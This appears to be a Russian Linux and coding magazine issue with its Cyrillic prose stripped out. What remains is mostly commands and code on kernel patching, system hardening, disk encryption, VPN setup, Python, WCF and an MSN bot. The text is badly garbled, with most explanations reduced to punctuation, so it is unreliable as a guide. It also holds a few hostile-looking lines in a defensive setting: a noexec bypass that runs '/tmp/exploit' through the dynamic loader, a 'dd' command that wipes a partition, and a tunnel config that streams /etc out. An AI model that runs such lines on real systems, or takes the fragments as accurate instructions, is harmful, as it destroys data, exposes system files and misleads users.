. Custom,
. , Grsecurity Sysctl
support, /
sysctl .
,
.
/
RBAC (Role Based Access Control)
.

gradm2, :

!
, production-,
24x7. ,
secutity-update , .
downtime . .
. :
, , ksplice.com .

uptrack.
# uptrack-upgrade
! , uname -a .
# uptrack-show
.
-, ,
e-mail . rebootless
, , $3,95 ( 20, $2,95).
30 . .
, ,
.

088

$ sudo apt-get install gradm2

ZEN-KERNEL
Zen-kernel ,
. . zenkernel :
( 2.6.34-zen1);
git';
.
: zen-stable.git ( ,
) zen.git ( git-
).
:
( BFS);
Reiser4;
Linux-PHC , CPU
;
( Lenovo ThinkPad SL,
Gamecube/Wii, Macbook, WiFi- );
Tuxonice , hibernate (
,
);
FatELF ,
( Universal Binary Mac OS X);
DazukoFS , on access
. .


, , .
Ubuntu, .
( ),

:
$ sudo apt-get install linux-source

zen-kernel , generic-
ubuntu, . ,
:
$ sudo apt-get install build-essential libncurses5-dev \
libgtk2.0-dev libglade2-dev libqt3-mt-dev git-core

src,
/usr/src:
X 10 /141/ 10

reiser4
$ sudo usermod -a -G src adept

git- ( 500 ):
$ cd /usr/src
$ git clone git://zen-kernel.org/kernel/zen-stable.git
linux-2.6-zen

, :
$ git tag # ,

:
$ git checkout v2.6.34-zen1

git.
, . :
$ cd /usr/src/linux-2.6.34
$ zcat ../patch-2.6.35.bz2 | patch -p1

patch '--dry-run', X 10 /141/ 10

, , .
:
make config , .
( );
make allnoconfig/allyesconfig ,
no/yes;
make defconfig ;
make randconfig ;
make oldconfig .
, ;
make menuconfig , ncurses,
;
make nconfig 2.6.35. , ncurses, ,
, menuconfig;
make xconfig QT;
make gconfig GTK.
menuconfig.
-

. :
, ( ,
/) , . , . ,
, , .

089

UNIXOID

EXPERIMENTAL . Device
Drivers Staging Drivers.
.
,
General Setup Local Version.
. , ( .config),
:
$ make

-j , .
,
. :
$ sudo make modules_install
$ sudo make install

/lib/modules/,
/boot. initrd :

-
-
- . , , .
ccache, .
.
ccache
$ make CC="ccache gcc" CXX="ccache g++"
~/.ccache,

$ ccache -s

090

$ sudo update-initramfs -k v2.6.34-zen1 -c

grub, :
$ sudo update-grub

, , , .

. DEBIAN-WAY
, . ,
,
,
.
Debian/Ubuntu make-kpkg. ,
make-kpkg, :
$ sudo apt-get install kernel-package

, ,
:
$ fakeroot make-kpkg --initrd --revision=mykernel \
kernel_image kernel_headers modules_image

, : linuximage-version-revision.deb ( ) linux-headersversion-revision.deb ( ), /
usr/src. , , :
$ sudo dpkg -i /usr/src/*.deb
$ sudo reboot

MAKE COMPLETE
, ,
.
OpenVZ Xen, Openwall, ( ).z
X 10 /141/ 10

UNIXOID
zobni n@gmail.com

100

Linux-

UNIX- .
, ,

,
. ,

? ,
.

,
.
, ,
:
1. -.
. , ,
, ,
.
, ,
.
2. , -
.

( ).

.
3. , ,

092

,
, ,
, ,
.

.
4. , (, , )
,

,

DDoS.
.
5.
DOS-,
,

, ( , , ),

.


( )
.
,
,

, - 0,1%.

!
. ,
. -,
,
. :
( <Ctrl+Alt+L>).
-, ,
qwerty 123.
:
( , ,
X 10 /141/ 10


INFO).
GRUB ,
. : GRUB
( ). , GRUB ,
BIOS,
CD-ROM LiveCD,
.
:
BIOS. :
CMOS
,
. : .
,
. :

.
, , ,
:
. , ,
.
,
CD-,
USB- /.
<Ctrl+Alt+Del>
. ,
/etc/inittab,
ca::ctrlaltdel:/sbin/shutdown -t3 -r now
/sbin/init q.


, ,
.
,

.
- , ,

(. ][ 06.2010). , .
: ,
.
,
DoS/DDoS.
, , , , ,
(][ 09.2009).
X 10 /141/ 10

Tiger

,
.
, Ubuntu, Fedora, OpenSuSE,
,

. , :
,
, . Ubuntu
(System Administration Software Sources
Updates Automatic updates, Install security updates
without confirmation)
/etc/apt/apt.conf.d/10periodic:
$ sudo vi /etc/apt/apt.conf.d/10periodic
APT::Periodic::Enable "1";
APT::Periodic::Update-Package-Lists "1";
APT::Periodic::Download-UpgradeablePackages "1";
APT::Periodic::AutocleanInterval "5";
APT::Periodic::Unattended-Upgrade "1";

, ,
.

, SELinux AppArmor ( Ubuntu, OpenSuSE Fedora),
,
(
Linux,
][).

INFO

info

,

APG,

,

.
suid/
sgid-

:
$ find / -type f \
( -perm -004000 -o
-perm -002000 \)
-links +1 -ls

093

UNIXOID

Tiger

SUID- Linux



( UNIX -
,
), ,
root. ,
,
. , root, .
1. su
, root ,
. ,
/etc/pam.d/su auth required pam_wheel.so
auth sufficient pam_rootok.so. su
, wheel (,
).
2. root ,
,

GRUB
GRUB :
1. /sbin/grub
md5crypt.
md5-.
2. /boot/grub/grub.conf
password --md5 -.

Tiger
Tiger , shell-,
, UNIX-.
, ,
. chkrootkit John the
ripper.

Zeppoo
Zeppoo Linux ,
, ,
/dev/kmem /dev/
mem. : http://sourceforge.net/
projects/zeppoo.

094

root' .
,
: /tmp
(,
- FTP-). ,

noexec ( nosuid,nodev). :
/dev/sda5 /tmp ext2 nosuid,noexec,nodev 0 0


.
:
$ /lib/ld-linux.so.2 /tmp/exploit

, Linux
, RSBAC (www.rsbac.org),
.
3. -
,
: , SUID-.
root-.
( , ), SUID- . ,
, SUID- .
SUID- find:
$ sudo find / -type f \( -perm -04000 -o \
-perm -02000 \) \-exec ls {} \;


root:
$ sudo chmod a-s ///

,
. , man .
4. .
-
,
- (,

X 10 /141/ 10

rkhunter
, ,
). , :
# find /dir -xdev -type d \( -perm -0002 -a \
! -perm -1000 \) -print

5. ,

. , , , FTP-,
-.

( ).
, , ..
. . ,
, ( 022),
- , (
, ).
,
~/.profile:
umask 077


.
, -
, (OpenSSH, ), ,
, FreeBSD Jail Linux
VServer ( ).

- - pidgin.
. ,
, ,
( root
, ). , Firefox,
.
X 10 /141/ 10

, rkhunter
,


( /home ,
).
Linux- Yama (http://lkml.
org/lkml/2010/6/23/25), Canonical.
Yama Ubuntu
:

.
, /tmp /var/tmp. ,
. Yama
, ,
, UID , , UID
.
.
,
, , .

. Yama
, .
ptrace.
ptrace, UID UID,
ptrace. ,


. Yama
ptrace -.


, ,
, , ? .
- ,

( ,
-, -

095

UNIXOID

,
/etc/aide/aide.conf.d,
- .
AIDE,
aideinit:
$ sudo aideinit

/var/lib/aide
aide.db.new.
, :
$ sudo mv /var/lib/aide/aide.db.new /var/lib/aide/aide.
db

Chkrootkit
, ,
), , , ,
, , .
, ,
, ,
/, .
,
(
). ,
, HIDS
( ).
HIDS, UNIX-,
Tripwire,
AIDE (Advanced Intrusion
Detection Environment ). Tripwire, AIDE :
- ,
. :
AIDE
. -
, e-mail
.
AIDE
:
$ sudo apt-get install aide

$ sudo aide -c /etc/aide/aide.conf --check

AIDE cron,
. .
, AIDE, ,
AIDE
USB- (
aide.conf):
# cp /var/lib/aide/aide.db* /usr/bin/aide \
/etc/aide/aide.conf /etc/aide/aide.conf.d/* /media/

,
( , ..) . .
HIDS UNIX-
, .
chkrootkit rkhunter
(rkhunter
, ).
AIDE .
. :
$ sudo chkrootkit
$ sudo rkhunter --check

,
, ..
shell,
(awk, cat, grep, ) .
,
:

AIDE :
* /etc/default/aide
* /etc/aide/aide.conf

AIDE
. , ,
MAILTO , ( root).
,
( , ..)
, (/var/lib/aide/aide.db).

096

$ sudo chkrootkit -p /media/


$ sudo rkhunter --check --bindir /media/


. ,
, ,
. ,
, ,
,
, ,
. z
X 10 /141/ 10

UNIXOID
zobni n@gmail.com


LUKS/dm-crypt, TrueCrypt EncFS

. -
,
,
. ,
,
.
Linux

,
,

:
1. loop-aes (http://loop-aes.sourceforge.net)
Linux-
loop.ko, loopback-,
.
2. LUKS/dm-crypt ,
Linux- dm-crypt
TKS1/TKS2.
3. TrueCrypt

098

.
4. EncFS ,
,
.
, ,
,
. loop-aes
, ,
,
( loop-aes,

). LUKS/dm-crypt,

,
,
2.5
. LUKS/dm-crypt
Linux-, ,
loop-aes,
. TrueCrypt, Linux
Windows-, LUKS/dm-crypt,
, ,
- ( TrueCrypt
Windows Mac OS X),
(

). EncFS ,
X 10 /141/ 10

EncFS ,
EncFS
,
, .

, ,
, .

,
-
.
Watermark-,
(dm-crypt
CBC (ipher Block
Chaining)), ,
ESSIV, LRW XTS).
,
, , AES-256, Serpent Twofish.
, USB-
-.
loop-aes, LUKS/dm-crypt TrueCrypt
EncFS.
,


, , ,
. EncFS
, , ,
. EncFS ,
:
,
,
EncFS,
(, curlftpfs, , encfs,

).

LUKS/DM-CRYPT
LUKS/dm-crypt,
, :
dm-crypt
Linux- 2.6, Device Mapper (dm),
, API (Crypto
API),
.
LUKS (Linux Unified Key Setup) X 10 /141/ 10

Linux,
. LUKS
, ,

. , HAL,

,
LUKS-, ,
, LUKS/
dm-crypt,
, .
LUKS/dm-crypt
.
LUKS-
cryptsetup-luks,
(, Ubuntu)
cryptsetup.
:
$ sudo apt-get install cryptsetup

, dm-crypt .
, :
$ sudo modprobe dm-crypt
$ sudo modprobe sha256
$ sudo modprobe aes

,
/etc/modules:
$ sudo -i
# echo "dm-crypt\nsha256\naes" >> /etc/modules

, , (
, ):
$ sudo dd if=/dev/zero of=/dev/sda5 bs=4K


,
( ,
):

INFO

info
EncFS
Linux,
Mac OS X, FreeBSD
, ,
UNIX,

fuse.

EncFS Windows

www.assembla.com/spaces/
wencfs.

WARNING
warning

/etc/updatedb.
conf.
,

EncFS,

,


inode,

$ sudo dd if=/dev/random of=/dev/sda5 bs=4K

099

UNIXOID


TrueCrypt
TrueCrypt

LUKS/dm-crypt
LUKS/dm-crypt ,
:
# dd if=/dev/urandom of=luks.img bs=1M count=100
# losetup /dev/loop0 luks.img
# cryptsetup luksFormat /dev/loop0 -c aes-cbcessiv:sha256 -s 256
# cryptsetup luksOpen /dev/loop0 luks
# mkfs.ext2 /dev/mapper/luks
# mkdir /mnt/luks
# mount /dev/mapper/luks /luks

LUKS- cryptsetup:
$ sudo cryptsetup luksFormat /dev/sda5 \
-c aes-xts-plain -s 256

'-c' , AES-XTS (

CBC, ECB; Watermark-). '-s'
. cryptsetup , ,
. -
.
, ,
Device Mapper
(
dm-crypt
):
$ sudo cryptsetup luksOpen /dev/sda5

:
$ sudo mkfs.ext4 /dev/mapper/ -L
$ sudo mkdir /mnt/
$ sudo mount /dev/mapper/ /mnt/


,
,
/etc/crypttab /etc/fstab:
$ sudo -i
# echo " /dev/sda5 none luks,cipher=aes-cbcessiv:sha256" >> /etc/crypttab
# echo "/dev/mapper/ /mnt/ ext4 defaults 0 0" \
>> /etc/fstab


,
.

,
/etc/fstab , /home.
/etc/crypttab /etc/fstab . HAL
LUKS-
(Gnome, KDE,
XFCE), , ,
. ,

:
$ sudo chown -R : /media/
$ sudo chmod g+s /media/

, ,
( '-L' mkfs).
LUKS/dm-crypt ( , )
. , .
LUKS luksAddKey cryptsetup:
$ sudo cryptsetup luksAddKey /dev/sda5

,
. , :
$ sudo cryptsetup luksDelKey /dev/sda5 ID-

Device Mapper
:
$ umount /mnt/
$ cryptsetup luksClose sda5

100


:
$ sudo cryptsetup luksDump /dev/sda5
X 10 /141/ 10

TrueCrypt

LUKS/dm-crypt
LUKS/dm-crypt ,
swap-:

TrueCrypt

# swapoff -a
# cryptsetup -d /dev/urandom create cryptoswap /dev/sda1
# mkswap /dev/mapper/cryptoswap -L accessisdenied -v1
# echo "cryptoswap /dev/sda1 /dev/urandom swap" >> /etc/crypttab
# echo "/dev/mapper/cryptoswap none swap sw 0 0" >> /etc/fstab
# swapon -a

,
USB- .
dd:
$ dd if=/dev/urandom of=/// bs=512 count=4

LUKS-:
$ sudo cryptsetup luksFormat -c aes-xts-plain -s 256 \
/dev/sda5 ///

:
$ sudo cryptsetup -d /// luksOpen \
/dev/sda5

TRUECRYPT
TrueCrypt
Windows 2004 , Linux ( 4.0), 2008 ,
TrueCrypt 5.0 Windows,
Linux.
TrueCrypt
, .
, LUKS, Linux- TrueCrypt
dm-crypt, , , fuse
/.
TrueCrypt
LUKS, .
-, TrueCrypt - ,
Windows, Mac OS X Linux, ,
( LUKS- Windows
FreeOTFE, ). , TrueCrypt
X 10 /141/ 10

, ,
. -, TrueCrypt ,
, (LUKS, ,
, ). -, TrueCrypt

(LUKS ).
( TrueCrypt
) TrueCrypt
, :
$ cd /tmp
$ wget http://www.truecrypt.org/download/truecrypt6.3a-linux-x86.tar.gz
$ tar -xzf truecrypt-6.3a-linux-x86.tar.gz
$ ./truecrypt-6.3a-setup-x86


( ). TrueCrypt
/usr,
(, ,
truecrypt-uninstall.sh).
truecrypt
.
/, ,
: (Create
Volume), , ,
.. Create Volume .
, (
), ( ),
, , ,
, (FAT, Ext2 Ext3) ..
. , ,
Select File , , -

101

UNIXOID

EncFS
, .
/tmp: crypted
EncFS, decrypted :
$ cd /tmp
$ mkdir crypted decrypted

EncFS:
$ encfs /tmp/crypted /tmp/decrypted

TrueCrypt

.
.
Dismount All .
,
TrueCrypt :
, '-t'.

. truecrypt -t -c
. (
TrueCrypt' ), :
$ truecrypt -t /// //

. :
EncFS . : expert
( x) paranoid ( p). ,
(AES Blowfish), ,
, Initialization Vector ( , ,
<Enter> ) .. paranoid

.
, ,
paranoid , expert
. ,
Blowfish AES, , .
1024
, EncFS .
4096 x86.
.
decrypted :
$
$
$
$

cd decrypted
echo qwerty > file1
echo asdfgh > file2
echo zxcvbn > file3

EncFS :
$
$
$
$

cd ..
fusermount -u /tmp/decrypted
cd crypted
ls

'-d':
$ truecrypt -d

, TrueCrypt LUKS
.
XTS, LUKS.

AES, Twofish Serpent, .
, TrueCrypt
,
.

ENCFS
EncFS ,
fuse , libfuse, OpenSSL . EncFS
:
$ sudo apt-get install encfs

102

, EncFS ,
. , EncFS
, .encfs .
,
(, ), MAC (Message authentication
code) .

?
Linux .
,
LUKS/dm-crypt,
/
. , LUKS/dm-crypt
,
. .
LUKS/dm-crypt loop-aes
TrueCrypt,
, EncFS,
(, ). z
X 10 /141/ 10

UNIXOID
grinder grinder@tux.in.ua

VPN

VPN-
,
- ,
LAN, ,
VPN. , ,

. , OpenSource.
VTUN
,

TCP/IP . (vtun.
sf.net) VTun:
(
6 2007 ).
,
,
, VTun
*nix : Linux,
*BSD Solaris. Debian/Ubuntu:
$ sudo apt-cache search vtun
vtun - virtual tunnel over TCP/IP
networks

VTun IP, PPP, SLIP, Ethernet, TTY


pipe.
TCP UDP.
128-
BlowFish,
OpenSSL.
zlib lzo.
X 10 /141/ 10

,

CPU . VTun
- .

( 5000 ), .

. VTun
,
.
NAT, VTun
,

TCP. ,
.

tun tap,
(userspace) . ,
, :
$ ls -al /dev/net/tun
crw-rw-rw- 1 root root 10, 200 201007-10 12:39 /dev/net/tun

,
CONFIG_TUN
CONFIG_ETHERTAP.
vtun Debian/Ubuntu:
$ sudo apt-get install vtun


/etc/vtund.conf.
,

.
, .
VTun.
. options default
,
:
$ sudo nano /etc/vtund.conf
options {
port 5000;
syslog daemon;
# -

103

UNIXOID

Ubuntu
Debian/Ubuntu
/etc/default/vtun.
:

VTun

HTTP://WWW
links
VTun
vtun.sf.net
tinc
tinc-vpn.org

n2n ntop.org/n2n
socat
www.dest-unreach.
org/socat/
CIPE
sites.inka.de/bigred/
devel/cipe.html

ifconfig /sbin/ifconfig;
route /sbin/route;
ip /sbin/ip;
firewall /sbin/iptables;
}
default {
compress lzo:9; #
speed 0; #
}
#
client1 {
passwd p@ssVV0rD;
# : tun, ether, tty, pipe
type tun;
proto udp;
encrypt yes;
# speed 256:128;
keepalive yes;
# ,
up {
ifconfig "%% 10.1.0.1 pointopoint 10.1.0.2
mtu 1450
#
# firewall "-t nat -A POSTROUTING -s 10.1.0.2
-j MASQUERADE";
};
# ()
down {
firewall "-t nat -F";
ifconfig "%% down";
};
}

up down, ,
VPN. , ,
, , .
, :
program /bin/sh "-c 'tar cf - /etc/*'";

104

$ sudo nano /etc/default/vtun


#
RUN_SERVER=yes

:
$ sudo invoke-rc.d vtun start

, ,
:
$ sudo vtund -s

, , , :
$ sudo nano /etc/vtund.conf
options {
port 5000;
timeout 60;
ifconfig /sbin/ifconfig;
route /sbin/route;
firewall /sbin/iptables;
}
client1 {
passwd p@ssVV0rD;
type tun;
up {
ifconfig "%% 10.1.0.2 pointopoint 10.1.0.1
mtu 1450";
route "add -net 1.2.3.4/16 gw 10.1.0.1";
};
}

Debian-based , /
etc/default/vtun, init- , .
$ sudo nano /etc/default/vtun
CLIENT0_NAME=client1
# IP VTun
CLIENT0_HOST=vtun.mydomain.ru

vtund , , IP- ()
:
X 10 /141/ 10

tinc.conf

tinc

$ sudo vtund - client1 vtun.mydomain.ru

, :

( /etc/tinc). VPN
, ,
tinc.conf:

$ sudo tail -f /var/log/message

ifconfig tun0 .
Vtun .
init-:
$ sudo invoke-rc.d vtun start

TINC

VPN - tinc (tinc-vpn.org).
( 1998 ), . VTun,
tinc IPv4/IPv6 ,
: Linux, *BSD, Mac OS X,
Solaris, Windows 2k-Se7en. , , iPhone, iPod.
OpenSSL, zlib lzo.
tinc Ethernet
, , , ,
. ,
.
, VTun, tinc TUN/TAP. tinc
.
Windows . Debian/Ubuntu :
$ sudo apt-get install tinc

, .
, ,
, . . /etc/tinc/net.boot
, tinc.
( ), :
$ sudo nano /etc/tinc/net.boot
vpnnet

/usr/share/doc/tinc/examples .
/etc/tinc .
VPN-,
. , /etc/tinc/
vpnnet, vpnnet.
VPN
-, ,
. VPN- ,
X 10 /141/ 10

$ sudo nano /etc/tinc/vpnnet/tinc.conf


#
Name = my_vpn
# ,
# ConnectTo
ConnectTo = vpn01
#
Device = /dev/net/tun
# VPN: router|switch|hub
Mode = switch
PrivateKeyFile = /etc/tinc/vpnnet/rsa_key.priv
#
BindToInterface = eth1
# , ,
# DirectOnly = yes
#
# Forwarding = <off|internal|kernel>

. .
hosts,
: my_vpn vpn01.
$ sudo nano /etc/tinc/vpnnet/hosts/my_vpn
# IP
Address = 1.2.3.4
# ,
Subnet = 192.168.1.0/24
# TCP
# TCPOnly = yes

,
.
$ sudo nano /etc/tinc/vpnnet/hosts/vpn01
Address = vpn01.mydomain.ru

tinc 655;
, , Port.
, ( ).
:
$ sudo tincd -n vpnnet -K

105

UNIXOID

supernode

anytun
man-

,
.
,
/ VPN: tinc-up/tinc-down, host-up/subnet-down, subnet-up/subnet-down.
, .

.
Linux, *BSD, Mac OS X, Windows ( GUI)
OpenWRT TUN/TAP-.
Debian/Ubuntu :

$ sudo nano /etc/tinc/vpnnet/tinc-up


#!/bin/sh
modprobe tun
ifconfig $INTERFACE 192.168.1.10 netmask 255.255.255.0

supernode
edge. N2N . supernode,
'-l' , .
'-v'. :
.

, :
$ sudo /etc/init.d/tinc start

, ifconfig
. - ,
:
$ sudo tincd -n vpnnet -d5 -D

N2N
N2N (network to network, ntop.org/n2n) ,
VPN- .
P2P-,
.
(Edge Node)
. UDP-. supernode,
, Edge Node
. supernode , ,
. , VPN.
supernode
. Supernode Edge
Node, .

( supernode),
. ,
N2N . ,
, . ,
N2N , VPN,

106

$ sudo apt-get install n2n

$ supernode -l 7654 -v

VPN- edge,
. :
-a IP-, VPN-;
- ;
-k VPN-;
-l supernode.

, supernode node1 node2.


:
node1$ sudo edge -a 10.1.2.1 -c mynetwork -k encryptme -l
1.2.3.4:7654
node2$ sudo edge -a 10.1.2.2 -c mynetwork -k encryptme -l
1.2.3.4:7654

Registering with supernode,


ifconfig edge0 . , , ,
IP. :
-h HTTP- ( );
-r / (
Edge Node, );
-f ;
-d TAP- (
X 10 /141/ 10

CIPE

: OpenVPN
HMM3

VPN
anytun-0.3.3.tar.gz 110
vtun-3.0.1.tar.gz 122
cipe-1.6.0.tar.gz 139
tinc-1.0.13.tar.gz 497
n2n_svn_23072010.tgz 535
socat-1.7.1.2.tar.gz 542
openvpn-2.1.1.tar.gz 860

Anycast
VoIP .
, VPN
.
Anycast- ,
- . VPN
anycast, , , unicast anycast-, SATP (Secure Anycast Tunneling Protocol).
SATP anytun (anytun.org).
Quagga,
UDP anycast NAT. . ,
, man .

CIPE (Crypto IP Encapsulation, sites.inka.de/bigred/


devel/cipe.html) .
CIPE ( CIPEv3) IP- UDP-, . cipcbx.
128- (Blowfish, IDEA),
. CIPE
, .
CIPE NAT
SOCKS,
. , ,
GRE .
CIPE Linux,
WinNT4.0 SP3/SP6, Win2k (cipewin32.sf.net).
(
2002 ), , CIPE . , Ubuntu cipe-common
cipe-source 6.06 (Dapper Drake),
CIPE
.

: (UDP, TCP,
UNIX, IP4, IP6, raw), , ,
, . socat
TCP- , Unix-, .
, SSL socat.
, .
Debian/Ubuntu , .
EXAMPLES, ,
. TUN-,
5555:
$ sudo socat -d -d TCP-LISTEN:5555,reuseaddr
TUN:192.168.1.1/24,up

, TCP-
:
$ socat TCP:1.2.3.4:5555 TUN:192.168.255.2/24,up

ifconfig tun0 .
SSL . :
).

, P2P VPN,
P2PVPN (p2pvpn.org).
. Java
, Java RE.
32- Linux Windows.
RSA (1024 ), AES (128 ).

NETCAT SOCAT
, , , TCP/UDP- , / , netcat.
. ( 2004 ), ()
: OpenBSD netcat, Ncat, Cryptcat, socat.
, socat (www.dest-unreach.org/socat/) X 10 /141/ 10

$ sudo socat openssl-listen:4444,reuseaddr,cert=/etc/vpn/


server.pem,cafile=/etc/vpn/client.crt echo

:
$ sudo socat stdio openssl-connect:example.ru:4444,cert=/
etc/vpn/client.pem,cafile=/etc/vpn/server.crt

, socat Linux, *BSD, OpenSolaris, Mac


OS X Cygwin.

. , VPN. ,
.z

107

CODING
akrasnoschekov@gmail.com

PYTHON
-

Python
:).
, ,
, ,
.
?! !

-, , , ,
. , ,
,
. , ,
:). -, , - . .
- ... , , .
:
( )
double area_of_circle(double r) {
return M_PI*pow(r,2);
}
int main() {
double r = 5;
cout << ": "<< area_of_circle(r)<< endl;
}

:
( )
class Circle {
double r;
public:
Circle(double r) { this->r = r; }
double area() { return M_PI*pow(this->r,2); }
void print_area() {

108

cout << ": "<< this->area() << endl;


}
};
int main() {(new Circle(5))->print_area();}

-... , ( ), - ( ).
- , , C++
.
( , ),
.

, , , .
,
,
, , .

, , .
:
:
.
/ .

- .
: Haskell, Erlang, F#
X 10 /141/ 10

>> coding

DVD
dvd


.
:).

. !
.
(
), .

,
.
:
, -
.
.

.
: Prolog

, , , .
:
Prolog
{ }
witch(X) <= burns(X) and female(X).
burns(X) <= wooden(X).
wooden(X) <= floats(X).
floats(X) <= sameweight(duck, X).
{ }
female(girl).
sameweight(duck,girl).
{ }
? witch(girl).

,
- ,
. .
,
.
, , .
f(x),
x .
,
,
.
X 10 /141/ 10

, , . :).
data :

data = [...]
sum = 0
for element in a:
sum += element ** 2
print sum

data = [...]
sq = lambda x: x**2
sum = lambda x,y: x+y
print reduce(sum, map(sq, data))

,
. ,

.
Lisp, ( , ?).

.
,
( ) .
,
,
.

,
. .

HTTP://WWW
links

,

:
http://www.python.org
http://en.wikipedia.
org/wiki
Programming_
paradigm
http://www.ibm.com/
developerworks/
library/l-prog.html

INFO

info
,


Lambda , ,
.
.
- :
.
. map, reduce

109

CODING


, ( )
( map) ( reduce).
, .
Lambda-
def add(n):
return lambda x: x + n
adds = [add(x) for x in xrange(100)]

.
. , ,
.

. : print length([5, 4/0, 3+2]).
, .

, .
!
.
, .

adds[34](5)

, .

.
,
. lambda x.
-
, .
,
. ,
. ,
, , , .

() , ,

.
.
,
,
.
,
. ,
.
, ,
.
:
-, ,
,
.
,
.
-, , . ,

110

,
,
syntactic sugar.
,
, .
, adds = [add(x)
for x in xrange(100)].
. , ?
, and or, if-elif-else.
, .

L = []
for x in xrange(10):
if x % 2 == 0:
if x**2>=50:
L.append(x)
else:
L.append(-x)
print L

print [x**2>=50 and x or -x for x in xrange(10) if
x%2==0]

,
, , . , ... .
, , , ,
, . .
, ,
.z
X 10 /141/ 10

CODING
c0n Difesa condifesa@gmail.com, http://defec.ru

se
rpri
Entervices
Se

et
.N

WCF

Messaging

g
in
t
o
m
e
R

Windows
Communication
Foundation (WCF)

WTF WCF?

Web Servic
es

WS
E

Windows Communication Foundation:


-
. Cloud Computing ,

,
.
.
.NET Framework.
.NET Remoting ,
. Microsoft ,
,
-. ,
.
,
Remoting, Windows Communication
Foundation, , , .NET Framework.
,
-,
,
-

112

. ,
, cloud computing , ,
,
. ,
?
WCF.
-.
, WCF WEB HTTP,

- :
// (GET POST), (URI),
( XML, AJAX JSON,
SOAP). , .
-
:
. ,
X 10 /141/ 10

>> coding


.
,
(, , , ) , .
WCF
, .


.

: SOAP REST.
SOAP (Simple Object Access Protocol)
,
.
.NET Remoting.
SOAP .
,
.
GetBalance(int AccountID)
. HTTP-
:
SOAP-
// HTTP-

SOAPAction: GetBalance

//SOAP-
<soap: Envelope xmlns: soap >
// SOAP-
<soap: Body>
<GetBalance xmlns = >
<Account>2</Account>
</GetBalance>
</soap: Body>
</soap: Envelope>

SOAP- . REST (Representational State Transfer)


SOAP.
, HTTP, URI, XML.

, SOAP,
, URI.
/ -
X 10 /141/ 10

RESP
HTTP (GET, POST, PUT, DELETE).
URL, : www.servicesite.com/Accounts/2.
, ,
URL, .
,
,
.

REST-
,

SOAP
,


-, SOAP-,

.
SOAP:
XML- , . REST
.
,
, ,
. , grid-, MD5-, ,
MD5- ,
.
WCF ,
.

DVD
dvd

.

.

HTTP://WWW
links
www.xakep.ru/
post/52434/
.NET Remoting:

grid-.
www.techdays.ru/

,

WCF.
http://defec.ru
,

.

113

CODING

, ,
. , ,
(/) .

SOAP

MICROSOFT

WCF- WCF-
. ,
, - . ( Remoting!)
( ). WCF- ,
, ,
,
.
, ( ), .


WCF-
WCF-

: HTTP, TCP,
MSMQ . WCF SOAP. ,
, REST-.
Windows Communication Foundation :
1. (Address);
2. (Binding);
3. (Contract).

. . , , .
URI (
, , ).
, , (,
TcpTransportBindingElement TCP),
(
ReliableSessionBindingElement)
SOAP- (
SecurityBindingElement). , ,
, .

114

WCF- ,

.

ServiceContractAttribute ( Remoting).
, ,
,
OperationContractAttribute. ,
:

[ServiceContract]
public interface AddIntPoint
{
[OperationContract]
int Add(int x, int y);
}


, :

public class AddService : AddIntPoint
{
public int Add(int x, int y)
{ return x + y; }
}

AddService WCF-
.
. ,
, PasswordCrack (string MD5hash),
. ,
( -
), WCF-
.
:

public class WCFServiceApp
{
//
public void DefineEndpointImperatively()
{...}
//

public void DefineEndpointInConfig()


{...}
}

DefineEndpointImperatively() , , HTTP :
...
ServiceHost sh = new ServiceHost(typeof(AddService));
sh.AddServiceEndpoint(
typeof(AddIntPoint),
X 10 /141/ 10

>> coding

WCF
new WSHttpBinding(),
"http://localhost/AddService/Ep1");
sh.Open();
...

AddIntPoint :
public class WCFClientApp
{
//
public void SendMessageToEndpoint()
{
MathProxy proxy = new MathProxy();
int result = proxy.Add(35, 7);
}
}


. ,
,
,
() .

.
, ,
,
. .
, ,
/
( ,
..). WCF-
IIS- (
X 10 /141/ 10

-,
).
, HTTP.

, ?

WCF :
, , .
, Windows Communication
Foundation, .
.
- ( ) ,

.
. ,
, :
?. , , . , . , ? :

, - . ,

, .

, WCF-
, .
,

.
.z

115

CODING
www.flenov.info

MSN-


IM-

IM- ? , .
? , MSN. , ( ,
), . ,
,
.
?

-,
(, )
, .
( ) Microsoft Messenger, ,
. Microsoft
, ,
, , MS, .
.
,
MSNPSharp (http://code.google.
com/p/msnp-sharp/).
,
, MSN-.
MSNPSharp, .


, . , , :
1. ;
2. - ,
.
, ;
3. - ,
.

116

,
. (
, ),

. ,
MSN .

Messenger,
:
Messenger messenger = new Messenger();

. MSNPSharp . ,
,
.
. ,
.
, , .
, , .
. ,
:
NameserverProcessor.ConnectionEstablished , ;
Nameserver.SignedIn ;
Nameserver.SignedOff ,
X 10 /141/ 10

>> coding

. ,
. , *nix-.
,
.
, .
, .
, MSN-
, .
- ,
.
, . , -
, . , MSN,
Nameserver . ,
AddNewContact ContactService. ?
, :
Messenger.Nameserver.ContactService.
AddNewContact("pamela_anderson@hotmail.com");

, . ContactList, .
, All (ContactList.All).
:
Allowed ;
BlockedList ,
.


-, ;
Nameserver.AuthenticationError ;
ConversationCreated
.

, . .
, . Credentials, .
Credentials
. , ,
, :

,
. ,
. , AutoSynchronize true:
messenger.Nameserver.AutoSynchronize = true;

,
AutoSynchronize
ConnectionEstablished.
.

, SignedIn,
. ,
, online :
messenger.Owner.Status = PresenceStatus.Online;

messenger.Credentials = new Credentials(


"youaccount@hotmail.com", "qwerty");


,
Connect();.

, . - ,
, invite ,
.
,
e-. , , ,
X 10 /141/ 10

,
PresenceStatus.Busy. ,
, -,
, .
. .
,
Conversation:
Conversation conversation =
messenger.CreateConversation();

,
ConversationCreated. ,

117

CODING

MSNPSharp

,
, .
, messenger- , , MsnAccountTo:
private void messenger_ConversationCreated(
object sender, ConversationCreatedEventArgs e)
{
if (e.Initiator != null)
{
foreach (MSNPSharp.Contact
contact in messenger.ContactList.All)
{
if (contact.Mail == MsnAccountTo)
{
e.Conversation.ContactJoined +=
new EventHandler<ContactEventArgs>(
ContactJoined);
e.Conversation.Invite(contact);
return;
}
}
messenger.Nameserver.ContactService.AddNewContact
(MsnAccountTo);
}
}

, .
- ,
, .
Conversation .
ContactJoined , , :
e.Conversation.ContactJoined +=
new EventHandler<ContactEventArgs>(ContactJoined);

Invite :
e.Conversation.Invite(contact);

118

. ConversationCreated . ,
, . , ,
,
. , .
.
,
ContactJoined. . , :
private void ContactJoined(object sender,
ContactEventArgs e)
{
TextMessage message =
new TextMessage(currentmessage);
(sender as Conversation).SendTextMessage(message);
}

.
TextMessage.
.
Conversation,
, . ,
SendTextMessage
.
Conversation , .
, Conversation .

. , MSN
, Skype,
, .
-,
, , .
. z
X 10 /141/ 10

CODING
stannic.man@gmail.com

: ( )

?
? ,
,
Alt+TAB? ,
, ?
? !
? .
